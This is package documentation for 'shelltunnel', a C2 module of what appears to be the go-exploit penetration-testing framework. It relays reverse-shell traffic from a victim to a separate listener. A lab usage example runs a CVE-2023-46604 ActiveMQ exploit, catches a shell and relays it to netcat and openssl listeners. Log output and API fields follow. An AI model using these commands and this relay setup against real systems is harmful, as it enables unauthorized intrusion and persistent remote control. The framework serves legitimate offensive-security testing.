Documentation
¶
Overview ¶
shelltunnel is a simple C2 that copies shell traffic between a reverse shell origin and a connectback server. It essentially allows for this setup:
| Box 1 | | Box 2 | | Box 3 | | nc -l | <- shell traffic -> | shell tunnel | <- shell traffic -> | shell origin |
Where 'nc -l' is basically any C&C you want that accepts reverse shells, box 2 is the attacker box, and box 3 is the victim. In this example, go-exploit on box 2 (attacker box) can act as an egress for the reverse shell generated on the victim (box 3). The shell tunnel will just copy the traffic data between the two boxes (1 & 3). This is appealing over something like a socks5 proxy or more advanced tunneling because it simply works and requires, for the exploit dev, no extra work beyond generating the initial shell (via *ShellServer or a binary or whatever).
Usage example using an unencrypted reverse shell:
albinolobster@mournland:~/initial-access/feed/cve-2023-46604$ ./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12 time=2024-10-28T15:05:21.600-04:00 level=STATUS msg="Starting listener on 10.9.49.192:1270" time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.56 port=61616 ssl=false "ssl auto"=false time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.192:1270" time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="HTTP server listening for 10.9.49.192:8080/TMURWfRGRdSZ" time=2024-10-28T15:05:23.603-04:00 level=STATUS msg=Connecting... time=2024-10-28T15:05:23.630-04:00 level=STATUS msg="Sending exploit" time=2024-10-28T15:05:23.656-04:00 level=STATUS msg="Sending payload" time=2024-10-28T15:05:23.675-04:00 level=STATUS msg="Sending payload" time=2024-10-28T15:05:23.757-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.56:48440" time=2024-10-28T15:05:23.758-04:00 level=SUCCESS msg="Connect back to 10.9.49.12:1270 success!" time=2024-10-28T15:05:28.633-04:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
Above, you can see we've exploited a remote ActiveMQ (10.9.49.56), caught a reverse shell, and connected it back to a listener at 10.9.49.12:1270. The shell there looks like this:
parallels@ubuntu-linux-22-04-02-desktop:~$ nc -lvnp 1270 Listening on 0.0.0.0 1270 Connection received on 10.9.49.192 51478 pwd /opt/apache-activemq-5.15.2
The tunnel can also support catching and relaying TLS (or a mix of either). For example, the above can be updated like so:
./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12 -shellTunnel.cbSSL -shellTunnel.sslListen
And the reverse shell can now be caught by openssl:
parallels@ubuntu-linux-22-04-02-desktop:~$ openssl s_server -quiet -key key.pem -cert cert.pem -port 1270 pwd /opt/apache-activemq-5.15.2
Index ¶
Constants ¶
This section is empty.
Variables ¶
var (
ErrTLSListener = errors.New("tls listener init")
)
Functions ¶
This section is empty.
Types ¶
type Server ¶
type Server struct {
// the TCP listener that will accept all the connections
Listener net.Listener
// the server address/hostname to tunnel the data to
ConnectBackHost string
// the server port to tunnel the data to
ConnectBackPort int
// indicates if we should use an encrypted tunnel to the server
ConnectBackSSL bool
// indicates if we should be listening as an SSL server
SSLShellServer bool
// The file path to the user provided private key (if provided)
PrivateKeyFile string
// The file path to the user provided certificate (if provided)
CertificateFile string
// contains filtered or unexported fields
}
func GetInstance ¶
func GetInstance() *Server
func (*Server) CreateFlags ¶
func (shellTunnel *Server) CreateFlags()
Source Files